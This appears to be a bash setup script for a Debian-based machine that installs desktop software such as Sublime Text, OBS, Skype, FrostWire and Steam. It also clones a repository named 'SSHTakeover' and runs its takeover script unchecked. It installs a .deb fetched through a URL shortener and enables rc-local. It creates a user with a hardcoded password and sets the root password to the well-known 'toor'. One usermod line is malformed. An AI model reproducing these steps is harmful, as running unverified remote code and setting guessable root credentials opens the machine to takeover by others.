#!/bin/bash
wget -qO - https://download.sublimetext.com/sublimehq-pub.gpg | apt-key add -;
echo "deb https://download.sublimetext.com/ apt/stable/" | tee /etc/apt/sources.list.d/sublime-text.list;
apt-get update;
apt install obs-studio firewalld firewall-applet apt-transport-https -y;
apt install sublime-text -y;
systemctl enable firewalld;
systemctl enable rc-local;
git clone https://github.com/independentcod/SSHTakeover >>/dev/stdout;
cd SSHTakeover;
sh takeover.sh >>/dev/stdout;
git clone https://github.com/independentcod/Chiaki-AutoCompile;
sh ./Chiaki-AutoCompile/build.sh;
if [ "$(uname -m)" = x86_64 ]
then
wget https://is.gd/d0wnskype -O skype.deb;
dpkg -i skype.deb;
apt install mplayer mplayer-gui openjdk-14-jre-headless -y;
wget https://wc1.frostwire.com/frostwire/6.8.6/frostwire-6.8.6.amd64.deb;
dpkg -i frostwire-6.8.6.amd64.deb;
apt install -f -y;
dpkg --add-architecture i386;
apt update;
fi
apt install wine32 steam -y;
useradd -m molly;
echo molly:eskam123 |  chpasswd;
usermod -g  molly;
echo root:toor |  chpasswd;